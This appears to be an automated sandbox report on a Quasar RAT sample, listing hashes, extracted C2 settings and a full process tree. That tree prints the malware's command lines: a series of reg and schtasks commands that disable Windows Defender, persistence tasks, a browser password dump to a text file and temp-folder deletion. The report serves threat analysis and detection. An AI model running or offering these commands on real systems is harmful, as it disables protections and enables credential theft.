Analysis
max time kernel: 148s
max time network: 168s
platform: windows7_x64
resource: win7-en-20211208
submitted: 10-03-2022 18:45

Static task: static1

Behavioral task: behavioral1
  Sample: 50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe
  Resource: win7-en-20211208

Behavioral task: behavioral2
  Sample: 50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe
  Resource: win10v2004-en-20220113

General
Target: 50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe
Size: 6.2MB
MD5: 942b78bcd8a5aa6d10436832b1260671
SHA1: e35e87e58f94e304dd0b97e9b85c6cb30146978d
SHA256: 50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90
SHA512: 89baba3a305d1d6969b68e4f63c294a861fc755f65ac6d0f5a67f7d6b7aa26cd852f78ce0441af489a70991a9cd0887388687d89efd0f1fb95fb316490d030e3
Malware Config

Extracted: quasar
  2.1.0.0
  Windows Security Notification
  minecraftgaming009-61323.portmap.io:61323
  VNM_MUTEX_c2q7y2ayYutZ2XaYe7
  encryption_key: 1oSvdU99XhcwnNYl3rB8
  install_name: Windows Security Notification.exe
  log_directory: Logs
  reconnect_delay: 3000
  startup_key: Windows Security Notification
  subdirectory: SubDir

Extracted: quasar
  1.4.0.0
  Steam
  Minecrafthosting6969-35389.portmap.io:35389
  EAojkiVMQ0sDtyACyi
  encryption_key: P5xHRD8P5ncR2T1uRpgp
  install_name: Steam.exe
  log_directory: Logs
  reconnect_delay: 3000
  startup_key: Steam
  subdirectory: SubDir
Signatures

Contains code to disable Windows Defender (13 IoCs)
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource | yara_rule
behavioral1/files/0x00060000000125df-68.dat | disable_win_def
behavioral1/files/0x00060000000125df-67.dat | disable_win_def
behavioral1/memory/1348-78-0x0000000000C60000-0x0000000000CF6000-memory.dmp | disable_win_def
behavioral1/files/0x0006000000013096-101.dat | disable_win_def
behavioral1/files/0x0006000000013096-102.dat | disable_win_def
behavioral1/files/0x0006000000013096-103.dat | disable_win_def
behavioral1/memory/1484-104-0x00000000012D0000-0x0000000001366000-memory.dmp | disable_win_def
behavioral1/files/0x0006000000013096-117.dat | disable_win_def
behavioral1/files/0x0006000000013096-116.dat | disable_win_def
behavioral1/files/0x0006000000013096-115.dat | disable_win_def
behavioral1/files/0x0006000000013096-114.dat | disable_win_def
behavioral1/files/0x0006000000013096-121.dat | disable_win_def
behavioral1/files/0x0006000000013096-123.dat | disable_win_def

Modifies security service (2 TTPs, 1 IoCs)
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | reg.exe

Quasar Payload (14 IoCs)
resource | yara_rule
behavioral1/files/0x00060000000125df-68.dat | family_quasar
behavioral1/files/0x00060000000125df-67.dat | family_quasar
behavioral1/memory/1228-70-0x0000000000410000-0x000000000047A000-memory.dmp | family_quasar
behavioral1/memory/1348-78-0x0000000000C60000-0x0000000000CF6000-memory.dmp | family_quasar
behavioral1/files/0x0006000000013096-101.dat | family_quasar
behavioral1/files/0x0006000000013096-102.dat | family_quasar
behavioral1/files/0x0006000000013096-103.dat | family_quasar
behavioral1/memory/1484-104-0x00000000012D0000-0x0000000001366000-memory.dmp | family_quasar
behavioral1/files/0x0006000000013096-117.dat | family_quasar
behavioral1/files/0x0006000000013096-116.dat | family_quasar
behavioral1/files/0x0006000000013096-115.dat | family_quasar
behavioral1/files/0x0006000000013096-114.dat | family_quasar
behavioral1/files/0x0006000000013096-121.dat | family_quasar
behavioral1/files/0x0006000000013096-123.dat | family_quasar

description | flow | ioc | Process
File opened for modification | | C:\Windows\system32\GDIPFONTCACHEV1.DAT | 50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe
| 2 | ip-api.com | Process not Found
| 20 | api64.ipify.org | Process not Found
| 21 | api64.ipify.org | Process not Found

NirSoft WebBrowserPassView (3 IoCs)
Password recovery tool for various web browsers
resource | yara_rule
behavioral1/memory/1912-91-0x000000001B4A0000-0x000000001B7E2000-memory.dmp | WebBrowserPassView
behavioral1/files/0x000600000001337b-147.dat | WebBrowserPassView
behavioral1/files/0x000600000001337b-146.dat | WebBrowserPassView

Nirsoft (6 IoCs)
resource | yara_rule
behavioral1/memory/1912-91-0x000000001B4A0000-0x000000001B7E2000-memory.dmp | Nirsoft
behavioral1/files/0x00060000000132a5-139.dat | Nirsoft
behavioral1/files/0x00060000000132a5-140.dat | Nirsoft
behavioral1/files/0x000600000001337b-147.dat | Nirsoft
behavioral1/files/0x000600000001337b-146.dat | Nirsoft
behavioral1/files/0x00060000000132db-171.dat | Nirsoft

Executes dropped EXE (11 IoCs)
pid | Process
1772 | Uawisdwhppyu.exe
532 | Knfk.exe
1360 | Rtsveoxqatvjs.exe
1228 | Mtwgkvm.exe
1348 | Lzmicakkfbw.exe
1912 | RtkBtManServ.exe
1656 | Steam.exe
1484 | Windows Security Notification.exe
2108 | Windows Security Notification.exe
2408 | bfsvc.exe
2528 | snuvcdsm.exe

Deletes itself (1 IoCs)
pid | Process
2692 | cmd.exe

Drops startup file (2 IoCs)
description | ioc | Process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Update Manager330825.exe | Knfk.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Update Manager330825.exe | Knfk.exe

Loads dropped DLL (12 IoCs)
pid | Process
532 | Knfk.exe
1348 | Lzmicakkfbw.exe
1720 | WerFault.exe
1720 | WerFault.exe
1720 | WerFault.exe
1720 | WerFault.exe
1104 | WerFault.exe
1104 | WerFault.exe
1104 | WerFault.exe
1104 | WerFault.exe
1104 | WerFault.exe
1720 | WerFault.exe

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Windows security modification
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features | Lzmicakkfbw.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | Lzmicakkfbw.exe

Adds Run key to start application (2 TTPs, 4 IoCs)
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Windows\CurrentVersion\Run\Steam = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Mtwgkvm.exe\"" | Mtwgkvm.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Windows\CurrentVersion\Run\Steam = "\"C:\\Users\\Admin\\AppData\\Roaming\\SubDir\\Steam.exe\"" | Steam.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Security Notification = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Lzmicakkfbw.exe\"" | Lzmicakkfbw.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Security Notification = "\"C:\\Windows\\SysWOW64\\SubDir\\Windows Security Notification.exe\"" | Windows Security Notification.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTPs)

Looks up external IP address via web service (3 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
21 | api64.ipify.org
2 | ip-api.com
20 | api64.ipify.org

Drops file in System32 directory (5 IoCs)
description | ioc | Process
File opened for modification | C:\Windows\SysWOW64\SubDir\Windows Security Notification.exe | Windows Security Notification.exe
File opened for modification | C:\Windows\SysWOW64\SubDir | Windows Security Notification.exe
File created | C:\Windows\SysWOW64\SubDir\r77-x64.dll | Lzmicakkfbw.exe
File created | C:\Windows\SysWOW64\SubDir\Windows Security Notification.exe | Lzmicakkfbw.exe
File opened for modification | C:\Windows\SysWOW64\SubDir\Windows Security Notification.exe | Lzmicakkfbw.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Program crash (2 IoCs)
pid | pid_target | Process | procid_target
1720 | 1360 | WerFault.exe | 29
1104 | 1484 | WerFault.exe | 61

Creates scheduled task(s) (1 TTPs, 4 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
1408 | schtasks.exe
1056 | schtasks.exe
1900 | schtasks.exe
652 | schtasks.exe

Modifies system certificate store
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 | Lzmicakkfbw.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 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 | Lzmicakkfbw.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | RtkBtManServ.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | RtkBtManServ.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | RtkBtManServ.exe

Runs ping.exe (1 TTPs, 1 IoCs)
pid | Process
1468 | PING.EXE

Suspicious behavior: CmdExeWriteProcessMemorySpam (2 IoCs)
pid | Process
2408 | bfsvc.exe
2528 | snuvcdsm.exe

Suspicious behavior: EnumeratesProcesses (11 IoCs)
pid | Process
1360 | Rtsveoxqatvjs.exe
2108 | Windows Security Notification.exe
1252 | powershell.exe
1348 | Lzmicakkfbw.exe
1348 | Lzmicakkfbw.exe
1348 | Lzmicakkfbw.exe
1348 | Lzmicakkfbw.exe
1348 | Lzmicakkfbw.exe
1348 | Lzmicakkfbw.exe
1348 | Lzmicakkfbw.exe
2528 | snuvcdsm.exe

Suspicious use of AdjustPrivilegeToken (9 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 1360 | Rtsveoxqatvjs.exe
Token: SeDebugPrivilege | 1228 | Mtwgkvm.exe
Token: SeDebugPrivilege | 1348 | Lzmicakkfbw.exe
Token: SeDebugPrivilege | 1656 | Steam.exe
Token: SeDebugPrivilege | 1484 | Windows Security Notification.exe
Token: SeDebugPrivilege | 1484 | Windows Security Notification.exe
Token: SeDebugPrivilege | 1912 | RtkBtManServ.exe
Token: SeDebugPrivilege | 2108 | Windows Security Notification.exe
Token: SeDebugPrivilege | 1252 | powershell.exe

Suspicious use of SetWindowsHookEx (1 IoCs)
pid | Process
1484 | Windows Security Notification.exe

Suspicious use of WriteProcessMemory (64 IoCs)
description | pid | Process | procid_target
PID 956 wrote to memory of 1772 | 956 | 50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe | 27
PID 956 wrote to memory of 1772 | 956 | 50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe | 27
PID 956 wrote to memory of 1772 | 956 | 50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe | 27
PID 956 wrote to memory of 1772 | 956 | 50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe | 27
PID 956 wrote to memory of 532 | 956 | 50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe | 28
PID 956 wrote to memory of 532 | 956 | 50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe | 28
PID 956 wrote to memory of 532 | 956 | 50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe | 28
PID 956 wrote to memory of 532 | 956 | 50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe | 28
PID 956 wrote to memory of 1360 | 956 | 50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe | 29
PID 956 wrote to memory of 1360 | 956 | 50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe | 29
PID 956 wrote to memory of 1360 | 956 | 50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe | 29
PID 956 wrote to memory of 1360 | 956 | 50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe | 29
PID 956 wrote to memory of 1228 | 956 | 50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe | 30
PID 956 wrote to memory of 1228 | 956 | 50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe | 30
PID 956 wrote to memory of 1228 | 956 | 50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe | 30
PID 956 wrote to memory of 1348 | 956 | 50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe | 31
PID 956 wrote to memory of 1348 | 956 | 50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe | 31
PID 956 wrote to memory of 1348 | 956 | 50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe | 31
PID 956 wrote to memory of 1348 | 956 | 50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe | 31
PID 532 wrote to memory of 1912 | 532 | Knfk.exe | 33
PID 532 wrote to memory of 1912 | 532 | Knfk.exe | 33
PID 532 wrote to memory of 1912 | 532 | Knfk.exe | 33
PID 532 wrote to memory of 1912 | 532 | Knfk.exe | 33
PID 1228 wrote to memory of 652 | 1228 | Mtwgkvm.exe | 35
PID 1228 wrote to memory of 652 | 1228 | Mtwgkvm.exe | 35
PID 1228 wrote to memory of 652 | 1228 | Mtwgkvm.exe | 35
PID 1228 wrote to memory of 1656 | 1228 | Mtwgkvm.exe | 38
PID 1228 wrote to memory of 1656 | 1228 | Mtwgkvm.exe | 38
PID 1228 wrote to memory of 1656 | 1228 | Mtwgkvm.exe | 38
PID 532 wrote to memory of 360 | 532 | Knfk.exe | 39
PID 532 wrote to memory of 360 | 532 | Knfk.exe | 39
PID 532 wrote to memory of 360 | 532 | Knfk.exe | 39
PID 532 wrote to memory of 360 | 532 | Knfk.exe | 39
PID 360 wrote to memory of 1060 | 360 | cmd.exe | 41
PID 360 wrote to memory of 1060 | 360 | cmd.exe | 41
PID 360 wrote to memory of 1060 | 360 | cmd.exe | 41
PID 360 wrote to memory of 1060 | 360 | cmd.exe | 41
PID 1656 wrote to memory of 1408 | 1656 | Steam.exe | 42
PID 1656 wrote to memory of 1408 | 1656 | Steam.exe | 42
PID 1656 wrote to memory of 1408 | 1656 | Steam.exe | 42
PID 360 wrote to memory of 628 | 360 | cmd.exe | 44
PID 360 wrote to memory of 628 | 360 | cmd.exe | 44
PID 360 wrote to memory of 628 | 360 | cmd.exe | 44
PID 360 wrote to memory of 628 | 360 | cmd.exe | 44
PID 360 wrote to memory of 1464 | 360 | cmd.exe | 45
PID 360 wrote to memory of 1464 | 360 | cmd.exe | 45
PID 360 wrote to memory of 1464 | 360 | cmd.exe | 45
PID 360 wrote to memory of 1464 | 360 | cmd.exe | 45
PID 360 wrote to memory of 1532 | 360 | cmd.exe | 46
PID 360 wrote to memory of 1532 | 360 | cmd.exe | 46
PID 360 wrote to memory of 1532 | 360 | cmd.exe | 46
PID 360 wrote to memory of 1532 | 360 | cmd.exe | 46
PID 360 wrote to memory of 1820 | 360 | cmd.exe | 47
PID 360 wrote to memory of 1820 | 360 | cmd.exe | 47
PID 360 wrote to memory of 1820 | 360 | cmd.exe | 47
PID 360 wrote to memory of 1820 | 360 | cmd.exe | 47
PID 360 wrote to memory of 640 | 360 | cmd.exe | 48
PID 360 wrote to memory of 640 | 360 | cmd.exe | 48
PID 360 wrote to memory of 640 | 360 | cmd.exe | 48
PID 360 wrote to memory of 640 | 360 | cmd.exe | 48
PID 360 wrote to memory of 1340 | 360 | cmd.exe | 49
PID 360 wrote to memory of 1340 | 360 | cmd.exe | 49
PID 360 wrote to memory of 1340 | 360 | cmd.exe | 49
PID 360 wrote to memory of 1340 | 360 | cmd.exe | 49
Processes
(process tree; [n] is the nesting depth, each entry lists the image path, the command line, the signatures that matched and the PID)

[1] C:\Users\Admin\AppData\Local\Temp\50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\50b2e0afea299c4e8d079367ef95afeb700f9dc0dc05eee018ed2348ef38dc90.exe"
    - Quasar RAT
    - Suspicious use of WriteProcessMemory
    PID: 956

  [2] C:\Users\Admin\AppData\Local\Temp\Uawisdwhppyu.exe
      command line: "C:\Users\Admin\AppData\Local\Temp\Uawisdwhppyu.exe"
      - Executes dropped EXE
      PID: 1772

  [2] C:\Users\Admin\AppData\Local\Temp\Knfk.exe
      command line: "C:\Users\Admin\AppData\Local\Temp\Knfk.exe"
      - Executes dropped EXE
      - Drops startup file
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory
      PID: 532

    [3] C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe
        command line: "C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe" ZhXl39BlhP84+Y4kurA8wpehxxqA0X22IMYZ6Vpiqs4EpeebWszwq3L5jgvisNmyvGbyVAfjjb/WhkVRHM1jSY9bDQBPQUlA+KOt+q65oQzJt9yxASNarn9KPWpl7VpeJNaoB2sh/pMWGpfd1hNghc5haR0kkZkRiX8yULrHRxs=
        - Executes dropped EXE
        - Modifies system certificate store
        - Suspicious use of AdjustPrivilegeToken
        PID: 1912

      [4] C:\Windows\System32\WScript.exe
          command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
          PID: 2324

        [5] C:\Windows\System32\cmd.exe
            command line: "C:\Windows\System32\cmd.exe" /c compile.bat
            PID: 2380

          [6] C:\Users\Admin\AppData\Local\Temp\bfsvc.exe
              command line: C:\Users\Admin\AppData\Local\Temp\bfsvc.exe /capture /Filename "C:\Users\Admin\AppData\Local\Temp\capture.png"
              - Executes dropped EXE
              - Suspicious behavior: CmdExeWriteProcessMemorySpam
              PID: 2408

      [4] C:\Windows\System32\WScript.exe
          command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
          PID: 2456

        [5] C:\Windows\System32\cmd.exe
            command line: "C:\Windows\System32\cmd.exe" /c compile.bat
            PID: 2496

          [6] C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe
              command line: C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_Passwords.txt"
              - Executes dropped EXE
              - Suspicious behavior: CmdExeWriteProcessMemorySpam
              - Suspicious behavior: EnumeratesProcesses
              PID: 2528

      [4] C:\Windows\System32\WScript.exe
          command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
          PID: 2808

        [5] C:\Windows\System32\cmd.exe
            command line: "C:\Windows\System32\cmd.exe" /c compile.bat
            PID: 2844

    [3] C:\Windows\SysWOW64\cmd.exe
        command line: "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\dav.bat"
        - Suspicious use of WriteProcessMemory
        PID: 360

      [4] C:\Windows\SysWOW64\reg.exe
          command line: reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
          PID: 1060

      [4] C:\Windows\SysWOW64\reg.exe
          command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
          PID: 628

      [4] C:\Windows\SysWOW64\reg.exe
          command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
          PID: 1464

      [4] C:\Windows\SysWOW64\reg.exe
          command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
          PID: 1532

      [4] C:\Windows\SysWOW64\reg.exe
          command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
          PID: 1820

      [4] C:\Windows\SysWOW64\reg.exe
          command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
          PID: 640

      [4] C:\Windows\SysWOW64\reg.exe
          command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
          PID: 1340

      [4] C:\Windows\SysWOW64\reg.exe
          command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
          PID: 2032

      [4] C:\Windows\SysWOW64\reg.exe
          command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
          PID: 1928

      [4] C:\Windows\SysWOW64\reg.exe
          command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
          PID: 2008

      [4] C:\Windows\SysWOW64\reg.exe
          command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f´
          PID: 988

      [4] C:\Windows\SysWOW64\reg.exe
          command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
          PID: 1900

      [4] C:\Windows\SysWOW64\reg.exe
          command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
          PID: 852

      [4] C:\Windows\SysWOW64\reg.exe
          command line: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
          PID: 736

      [4] C:\Windows\SysWOW64\reg.exe
          command line: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
          PID: 1552

      [4] C:\Windows\SysWOW64\schtasks.exe
          command line: schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
          PID: 336

      [4] C:\Windows\SysWOW64\schtasks.exe
          command line: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
          PID: 1100

      [4] C:\Windows\SysWOW64\schtasks.exe
          command line: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
          PID: 1804

      [4] C:\Windows\SysWOW64\schtasks.exe
          command line: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
          PID: 2012

      [4] C:\Windows\SysWOW64\schtasks.exe
          command line: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
          PID: 1676

      [4] C:\Windows\SysWOW64\reg.exe
          command line: reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
          PID: 1720

      [4] C:\Windows\SysWOW64\reg.exe
          command line: reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
          PID: 1152

      [4] C:\Windows\SysWOW64\reg.exe
          command line: reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
          PID: 1532

      [4] C:\Windows\SysWOW64\reg.exe
          command line: reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
          PID: 1700

      [4] C:\Windows\SysWOW64\reg.exe
          command line: reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
          PID: 1928

      [4] C:\Windows\SysWOW64\reg.exe
          command line: reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
          PID: 1896

      [4] C:\Windows\SysWOW64\reg.exe
          command line: reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
          PID: 1104

      [4] C:\Windows\SysWOW64\reg.exe
          command line: reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
          PID: 1008

      [4] C:\Windows\SysWOW64\reg.exe
          command line: reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
          PID: 1060

      [4] C:\Windows\SysWOW64\reg.exe
          command line: reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
          - Modifies security service
          PID: 1820

  [2] C:\Users\Admin\AppData\Local\Temp\Rtsveoxqatvjs.exe
      command line: "C:\Users\Admin\AppData\Local\Temp\Rtsveoxqatvjs.exe"
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 1360

    [3] C:\Windows\SysWOW64\WerFault.exe
        command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1360 -s 1088
        - Loads dropped DLL
        - Program crash
        PID: 1720

  [2] C:\Users\Admin\AppData\Local\Temp\Mtwgkvm.exe
      command line: "C:\Users\Admin\AppData\Local\Temp\Mtwgkvm.exe"
      - Executes dropped EXE
      - Adds Run key to start application
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 1228

    [3] C:\Windows\system32\schtasks.exe
        command line: "schtasks" /create /tn "Steam" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Mtwgkvm.exe" /rl HIGHEST /f
        - Creates scheduled task(s)
        PID: 652

    [3] C:\Users\Admin\AppData\Roaming\SubDir\Steam.exe
        command line: "C:\Users\Admin\AppData\Roaming\SubDir\Steam.exe"
        - Executes dropped EXE
        - Adds Run key to start application
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        PID: 1656

      [4] C:\Windows\system32\schtasks.exe
          command line: "schtasks" /create /tn "Steam" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Steam.exe" /rl HIGHEST /f
          - Creates scheduled task(s)
          PID: 1408

  [2] C:\Users\Admin\AppData\Local\Temp\Lzmicakkfbw.exe
      command line: "C:\Users\Admin\AppData\Local\Temp\Lzmicakkfbw.exe"
      - Executes dropped EXE
      - Loads dropped DLL
      - Windows security modification
      - Adds Run key to start application
      - Drops file in System32 directory
      - Modifies system certificate store
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 1348

    [3] C:\Windows\SysWOW64\schtasks.exe
        command line: "schtasks" /create /tn "Windows Security Notification" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Lzmicakkfbw.exe" /rl HIGHEST /f
        - Creates scheduled task(s)
        PID: 1056

    [3] C:\Windows\SysWOW64\SubDir\Windows Security Notification.exe
        command line: "C:\Windows\SysWOW64\SubDir\Windows Security Notification.exe"
        - Executes dropped EXE
        - Adds Run key to start application
        - Drops file in System32 directory
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of SetWindowsHookEx
        PID: 1484

      [4] C:\Windows\SysWOW64\schtasks.exe
          command line: "schtasks" /create /tn "Windows Security Notification" /sc ONLOGON /tr "C:\Windows\SysWOW64\SubDir\Windows Security Notification.exe" /rl HIGHEST /f
          - Creates scheduled task(s)
          PID: 1900

      [4] C:\Windows\SysWOW64\cmd.exe
          command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\uplqX772QRKw.bat" "
          PID: 1676

        [5] C:\Windows\SysWOW64\chcp.com
            command line: chcp 65001
            PID: 1896

        [5] C:\Windows\SysWOW64\PING.EXE
            command line: ping -n 10 localhost
            - Runs ping.exe
            PID: 1468

        [5] C:\Windows\SysWOW64\SubDir\Windows Security Notification.exe
            command line: "C:\Windows\SysWOW64\SubDir\Windows Security Notification.exe"
            - Executes dropped EXE
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID: 2108

      [4] C:\Windows\SysWOW64\WerFault.exe
          command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1484 -s 1512
          - Loads dropped DLL
          - Program crash
          PID: 1104

    [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        command line: "powershell" Get-MpPreference -verbose
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 1252

    [3] C:\Windows\SysWOW64\cmd.exe
        command line: "C:\Windows\System32\cmd.exe" /k start /b del /q/f/s %TEMP%\* & exit
        PID: 2664

      [4] C:\Windows\SysWOW64\cmd.exe
          command line: C:\Windows\system32\cmd.exe /K del /q/f/s C:\Users\Admin\AppData\Local\Temp\*
          - Deletes itself
          PID: 2692